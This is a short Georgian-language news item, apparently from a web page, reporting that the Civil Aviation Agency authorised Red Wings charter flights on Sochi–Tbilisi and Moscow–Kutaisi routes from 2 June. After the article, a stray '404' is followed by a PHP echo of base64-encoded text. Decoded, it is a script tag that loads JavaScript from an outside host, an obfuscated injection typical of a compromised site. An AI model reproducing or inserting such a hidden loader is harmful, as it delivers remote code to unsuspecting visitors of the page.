celsiusi
ავერსი საქკაბელი

მიმდინარე წლის ივნისიდან ავიაკომპანია Red Wings-ი სოჭი-თბილისი-სოჭის და მოსკოვი-ქუთაისი-მოსკოვის საჰაერო ხაზებზე იწყებს ოპერირებას, – ინფორმაციას სამოქალაქო ავიაციის სააგენტო ავრცელებს.

სამოქალაქო ავიაციის სააგენტოს ცნობით, ავიაკომპანია არ იმყოფება ევროკავშირის შავ სიაში.

„Red Wings-ის მიერ სამოქალაქო ავიაციის სააგენტოში წარმოდგენილი განაცხადების შესაბამისად, მრავალჯერადი ჩარტერული ფრენები სოჭი-თბილისი-სოჭის მიმართულებით მიმდინარე წლის 2 ივნისიდან კვირაში 3 სიხშირით ყოველ ორშაბათს, ოთხშაბათს და პარასკევს განხორციელდება. მოსკოვი-ქუთაისი-მოსკოვის საჰაერო ხაზზე ჩარტერული ავიარეისები ასევე შესრულდება მიმდინარე წლის 2 ივნისიდან, კვირაში 3 სიხშირით ყოველ ორშაბათს, ოთხშაბათს და პარასკევს.

საქართველოს სამოქალაქო ავიაციის სააგენტომ ფრენების განხორციელებისათვის აუცილებელი ნებართვა ავიაკომპანიას მიმდინარე წლის 18 მაისს მიანიჭა“, – აღნიშნულია ინფორმაციაში.

404
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");